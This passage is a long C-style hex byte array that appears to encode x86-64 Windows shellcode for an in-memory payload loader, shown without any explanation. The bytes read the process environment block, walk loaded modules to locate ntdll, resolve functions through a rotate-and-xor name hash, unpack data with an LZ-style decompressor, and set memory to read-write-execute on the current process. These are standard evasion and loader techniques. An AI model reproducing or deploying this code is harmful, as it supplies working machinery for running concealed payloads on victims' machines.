2020 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x79, 0x0a, 0xb8,
2021 0x00, 0x00, 0x00, 0x00, 0xe9, 0x4c, 0x01, 0x00, 0x00, 0x8b, 0x55, 0xe4,
2022 0x48, 0x8b, 0x45, 0xe8, 0x41, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x86, 0xfe,
2023 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x32, 0x06, 0x00, 0x00, 0x44, 0x8b,
2024 0x45, 0xdc, 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b,
2025 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xd8, 0x48,
2026 0x89, 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89,
2027 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xc0, 0x0d, 0x00,
2028 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8d, 0x90, 0xac, 0x05, 0x00, 0x00,
2029 0x48, 0x8b, 0x45, 0xf0, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89,
2030 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x9d, 0xad, 0xff,
2031 0xff, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x83, 0x7d, 0xe8, 0x00, 0x75, 0x0a,
2032 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc7, 0x00, 0x00, 0x00, 0x48, 0x8d,
2033 0x05, 0x68, 0xfe, 0xff, 0xff, 0x48, 0x8d, 0x15, 0x3c, 0xfe, 0xff, 0xff,
2034 0x48, 0x29, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x85, 0xc0, 0x79,
2035 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa2, 0x00, 0x00, 0x00, 0x48,
2036 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0xe4, 0x48, 0x89,
2037 0x45, 0xd0, 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b,
2038 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xdc, 0x48,
2039 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x49, 0x89,
2040 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8,
2041 0x21, 0x0d, 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x79,
2042 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x51, 0x8b, 0x55, 0xe4, 0x48,
2043 0x8b, 0x45, 0xe8, 0x41, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0xc3, 0xfd, 0xff,
2044 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x37, 0x05, 0x00, 0x00, 0x44, 0x8b, 0x45,
2045 0xdc, 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55,
2046 0xf8, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xd8, 0x48, 0x89,
2047 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2,
2048 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xc5, 0x0c, 0x00, 0x00,
2049 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55,
2050 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x01, 0x00, 0x00, 0x00,
2051 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89,
2052 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00,
2053 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x3c,
2054 0x03, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x7f,
2055 0xaf, 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10, 0x48,
2056 0x8d, 0x90, 0xbc, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x41, 0xb9,
2057 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b,
2058 0x4d, 0x10, 0xe8, 0x53, 0xac, 0xff, 0xff, 0x48, 0x89, 0x45, 0xe8, 0x48,
2059 0x83, 0x7d, 0xe8, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
2060 0xa7, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x45, 0xc8,
2061 0x48, 0xc7, 0x45, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xd0,
2062 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24,
2063 0x28, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9,
2064 0x40, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7,
2065 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xfb, 0x0b, 0x00, 0x00, 0x89, 0x45,
2066 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x79, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00,
2067 0xeb, 0x55, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8d, 0x90, 0xe0, 0x05, 0x00,
2068 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48,
2069 0x89, 0xc1, 0xe8, 0x0d, 0x04, 0x00, 0x00, 0x44, 0x8b, 0x45, 0xe0, 0x48,
2070 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55, 0xf8, 0x48,
2071 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xdc, 0x48, 0x89, 0x54, 0x24,
2072 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7,
2073 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x9b, 0x0b, 0x00, 0x00, 0xb8, 0x01,
2074 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x90, 0x90, 0x90,
2075 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2076 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10,
2077 0x8b, 0x40, 0x14, 0x8d, 0x48, 0xff, 0x48, 0x8b, 0x55, 0x10, 0x89, 0x4a,
2078 0x14, 0x85, 0xc0, 0x75, 0x2a, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x00,
2079 0x48, 0x8d, 0x48, 0x01, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x0a, 0x0f,
2080 0xb6, 0x00, 0x0f, 0xb6, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x89, 0x50, 0x10,
2081 0x48, 0x8b, 0x45, 0x10, 0xc7, 0x40, 0x14, 0x07, 0x00, 0x00, 0x00, 0x48,
2082 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x10, 0xc1, 0xe8, 0x07, 0x83, 0xe0, 0x01,
2083 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x10, 0x8d, 0x14,
2084 0x00, 0x48, 0x8b, 0x45, 0x10, 0x89, 0x50, 0x10, 0x8b, 0x45, 0xfc, 0x48,
2085 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x83, 0xec, 0x38, 0x48,
2086 0x8d, 0x6c, 0x24, 0x30, 0x48, 0x89, 0x4d, 0x20, 0xc7, 0x45, 0xfc, 0x01,
2087 0x00, 0x00, 0x00, 0x8b, 0x45, 0xfc, 0x8d, 0x1c, 0x00, 0x48, 0x8b, 0x4d,
2088 0x20, 0xe8, 0x66, 0xff, 0xff, 0xff, 0x01, 0xd8, 0x89, 0x45, 0xfc, 0x48,
2089 0x8b, 0x4d, 0x20, 0xe8, 0x58, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x75, 0xdf,
2090 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x38, 0x5b, 0x5d, 0xc3, 0x55, 0x53,
2091 0x48, 0x83, 0xec, 0x58, 0x48, 0x8d, 0x6c, 0x24, 0x50, 0x48, 0x89, 0x4d,
2092 0x20, 0x48, 0x89, 0x55, 0x28, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0x45,
2093 0xd0, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xe4,
2094 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0xff, 0xff, 0xff, 0xff, 0xc7,
2095 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00,
2096 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8d, 0x42, 0x01, 0x48, 0x89, 0x45,
2097 0xd0, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x48, 0x01, 0x48, 0x89, 0x4d,
2098 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10, 0xe9, 0x41, 0x02, 0x00, 0x00, 0x48,
2099 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0xdd, 0xfe, 0xff, 0xff, 0x85,
2100 0xc0, 0x0f, 0x84, 0x09, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48,
2101 0x89, 0xc1, 0xe8, 0xc9, 0xfe, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0xf9,
2102 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0xb5,
2103 0xfe, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x76, 0xc7, 0x45, 0xfc, 0x00, 0x00,
2104 0x00, 0x00, 0xc7, 0x45, 0xe8, 0x04, 0x00, 0x00, 0x00, 0xeb, 0x1b, 0x8b,
2105 0x45, 0xfc, 0x8d, 0x1c, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1,
2106 0xe8, 0x8f, 0xfe, 0xff, 0xff, 0x01, 0xd8, 0x89, 0x45, 0xfc, 0x83, 0x6d,
2107 0xe8, 0x01, 0x83, 0x7d, 0xe8, 0x00, 0x75, 0xdf, 0x83, 0x7d, 0xfc, 0x00,
2108 0x74, 0x24, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8,
2109 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10,
2110 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8,
2111 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x50, 0x01, 0x48, 0x89,
2112 0x55, 0xd8, 0xc6, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
2113 0xe9, 0x93, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x50,
2114 0x01, 0x48, 0x89, 0x55, 0xd0, 0x0f, 0xb6, 0x00, 0x0f, 0xb6, 0xc0, 0x89,
2115 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x83, 0xe0, 0x01, 0x83, 0xc0, 0x02, 0x89,
2116 0x45, 0xf8, 0xd1, 0x6d, 0xfc, 0x83, 0x7d, 0xfc, 0x00, 0x74, 0x30, 0xeb,
2117 0x26, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8, 0x48,
2118 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10, 0x48,
2119 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8, 0x83,
2120 0x6d, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0xd4, 0xeb, 0x07, 0xc7,
2121 0x45, 0xec, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xfc, 0x89, 0x45, 0xf4,
2122 0xc7, 0x45, 0xf0, 0x01, 0x00, 0x00, 0x00, 0xe9, 0x20, 0x01, 0x00, 0x00,
2123 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x31, 0xfe, 0xff, 0xff,
2124 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x4e, 0x83, 0x7d, 0xfc,
2125 0x02, 0x75, 0x48, 0x8b, 0x45, 0xf4, 0x89, 0x45, 0xfc, 0x48, 0x8d, 0x45,
2126 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x10, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xf8,
2127 0xeb, 0x26, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8,
2128 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10,
2129 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8,
2130 0x83, 0x6d, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0xd4, 0xe9, 0x90,
2131 0x00, 0x00, 0x00, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x06, 0x83, 0x6d, 0xfc,
2132 0x03, 0xeb, 0x04, 0x83, 0x6d, 0xfc, 0x02, 0xc1, 0x65, 0xfc, 0x08, 0x48,
2133 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x50, 0x01, 0x48, 0x89, 0x55, 0xd0, 0x0f,
2134 0xb6, 0x00, 0x0f, 0xb6, 0xc0, 0x01, 0x45, 0xfc, 0x48, 0x8d, 0x45, 0xd0,
2135 0x48, 0x89, 0xc1, 0xe8, 0xa5, 0xfd, 0xff, 0xff, 0x89, 0x45, 0xf8, 0x81,
2136 0x7d, 0xfc, 0xff, 0x7c, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf8, 0x01,
2137 0x81, 0x7d, 0xfc, 0xff, 0x04, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf8,
2138 0x01, 0x83, 0x7d, 0xfc, 0x7f, 0x77, 0x2c, 0x83, 0x45, 0xf8, 0x02, 0xeb,
2139 0x26, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xfc, 0x48, 0xf7, 0xd8, 0x48,
2140 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10, 0x48,
2141 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x89, 0x45, 0xd8, 0x83,
2142 0x6d, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0xd4, 0x8b, 0x45, 0xfc,
2143 0x89, 0x45, 0xf4, 0xc7, 0x45, 0xf0, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x24,
2144 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8d, 0x42, 0x01, 0x48, 0x89, 0x45, 0xd0,
2145 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x48, 0x01, 0x48, 0x89, 0x4d, 0xd8,
2146 0x0f, 0xb6, 0x12, 0x88, 0x10, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
2147 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x84, 0xb5, 0xfd, 0xff, 0xff, 0x48, 0x8b,
2148 0x45, 0xd8, 0x48, 0x2b, 0x45, 0x28, 0x48, 0x83, 0xc4, 0x58, 0x5b, 0x5d,
2149 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
2150 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10,
2151 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x48,
2152 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x10, 0x8b, 0x45, 0x18,
2153 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10, 0x48, 0x83, 0x45, 0xf8,
2154 0x01, 0x8b, 0x45, 0x20, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x20, 0x85, 0xc0,
2155 0x75, 0xe3, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
2156 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10,
2157 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10,
2158 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0,
2159 0xeb, 0x17, 0x48, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45,
2160 0xf8, 0x88, 0x10, 0x48, 0x83, 0x45, 0xf8, 0x01, 0x48, 0x83, 0x45, 0xf0,
2161 0x01, 0x8b, 0x45, 0x20, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x20, 0x85, 0xc0,
2162 0x75, 0xdc, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
2163 0x55, 0x56, 0x53, 0x48, 0x8d, 0x2c, 0x24, 0x48, 0x89, 0x4d, 0x20, 0x48,
2164 0x89, 0x55, 0x28, 0x44, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x5d, 0x20, 0x48,
2165 0x8b, 0x75, 0x28, 0xeb, 0x38, 0x48, 0x89, 0xd8, 0x48, 0x8d, 0x58, 0x01,
2166 0x0f, 0xb6, 0x10, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x70, 0x01, 0x0f, 0xb6,
2167 0x00, 0x38, 0xc2, 0x74, 0x20, 0x48, 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10,
2168 0x48, 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x73, 0x07, 0xb8,
2169 0xff, 0xff, 0xff, 0xff, 0xeb, 0x19, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb,
2170 0x12, 0x8b, 0x45, 0x30, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x30, 0x85, 0xc0,
2171 0x75, 0xbb, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x5e, 0x5d, 0xc3, 0x55,
2172 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb,
2173 0x23, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18,
2174 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x74, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00,
2175 0xeb, 0x2f, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45, 0x18, 0x01,
2176 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x0b, 0x48,
2177 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc7, 0x48, 0x8b,
2178 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0, 0x0f, 0xb6,
2179 0xc0, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48,
2180 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb, 0x31, 0x48, 0x8b, 0x45,
2181 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x38,
2182 0xc2, 0x75, 0x1a, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0xc2, 0x48, 0x8b,
2183 0x4d, 0x10, 0xe8, 0x74, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x06, 0x48,
2184 0x8b, 0x45, 0x10, 0xeb, 0x15, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x8b,
2185 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc4, 0xb8, 0x00, 0x00,
2186 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
2187 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb, 0x1c, 0x48, 0x8b,
2188 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00,
2189 0x38, 0xc2, 0x75, 0x22, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45,
2190 0x18, 0x01, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
2191 0x0e, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xce,
2192 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x0f, 0xbe,
2193 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x0f, 0xbe, 0xc8, 0x89,
2194 0xd0, 0x29, 0xc8, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
2195 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb, 0x2b, 0x48, 0x8b, 0x45, 0x10, 0x0f,
2196 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x18, 0x0f,
2197 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x38, 0xc2, 0x74, 0x07, 0xb8, 0x00, 0x00,
2198 0x00, 0x00, 0xeb, 0x2f, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45,
2199 0x18, 0x01, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
2200 0x0b, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xbf,
2201 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0,
2202 0x0f, 0xb6, 0xc0, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
2203 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2204 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0xc7, 0x45, 0xfc, 0x00,
2205 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf8, 0x05, 0x05, 0xc2, 0x26, 0xeb, 0x28,
2206 0x8b, 0x45, 0xfc, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xfc, 0x89, 0xc2, 0x48,
2207 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x89, 0x45,
2208 0xf6, 0x0f, 0xb7, 0x55, 0xf6, 0x8b, 0x45, 0xf8, 0xc1, 0xc8, 0x08, 0x01,
2209 0xd0, 0x31, 0x45, 0xf8, 0x8b, 0x55, 0xfc, 0x48, 0x8b, 0x45, 0x10, 0x48,
2210 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc7, 0x8b, 0x45, 0xf8,
2211 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec, 0xc8,
2212 0x00, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0xc0, 0x00, 0x00, 0x00, 0x48,
2213 0x89, 0x4d, 0x20, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x00, 0x85, 0xc0, 0x74,
2214 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0x88, 0x03, 0x00, 0x00, 0xc7,
2215 0x85, 0x74, 0xff, 0xff, 0xff, 0x60, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x74,
2216 0xff, 0xff, 0xff, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x85, 0x68, 0xff,
2217 0xff, 0xff, 0x48, 0x8b, 0x85, 0x68, 0xff, 0xff, 0xff, 0x48, 0x89, 0x45,
2218 0xd0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45,
2219 0xc8, 0x48, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45,
2220 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xc8, 0x48, 0x8b, 0x40,
2221 0x10, 0x48, 0x89, 0x45, 0xe8, 0xe9, 0xa1, 0x00, 0x00, 0x00, 0x48, 0x8b,
2222 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b,
2223 0x45, 0xf0, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xc0, 0x8b, 0x40,
2224 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48,
2225 0x89, 0x45, 0xb8, 0x48, 0x8b, 0x45, 0xb8, 0x48, 0x05, 0x88, 0x00, 0x00,
2226 0x00, 0x48, 0x89, 0x45, 0xb0, 0x48, 0x8b, 0x45, 0xb0, 0x8b, 0x00, 0x89,
2227 0x45, 0xac, 0x83, 0x7d, 0xac, 0x00, 0x74, 0x4c, 0x8b, 0x55, 0xac, 0x48,
2228 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
2229 0x45, 0xf8, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2230 0x01, 0xd0, 0x48, 0x89, 0x45, 0xa0, 0x48, 0x8b, 0x45, 0xa0, 0x8b, 0x00,
2231 0x0d, 0x20, 0x20, 0x20, 0x20, 0x3d, 0x6e, 0x74, 0x64, 0x6c, 0x75, 0x1b,
2232 0x48, 0x8b, 0x45, 0xa0, 0x48, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0x0d, 0x20,
2233 0x20, 0x20, 0x20, 0x3d, 0x6c, 0x2e, 0x64, 0x6c, 0x74, 0x24, 0xeb, 0x04,
2234 0x90, 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x00, 0x48,
2235 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x48,
2236 0x85, 0xc0, 0x0f, 0x85, 0x4e, 0xff, 0xff, 0xff, 0xeb, 0x01, 0x90, 0x48,
2237 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
2238 0x6f, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x18, 0x89,
2239 0x45, 0xe4, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48,
2240 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8b,
2241 0x45, 0xf8, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2242 0x01, 0xd0, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40,
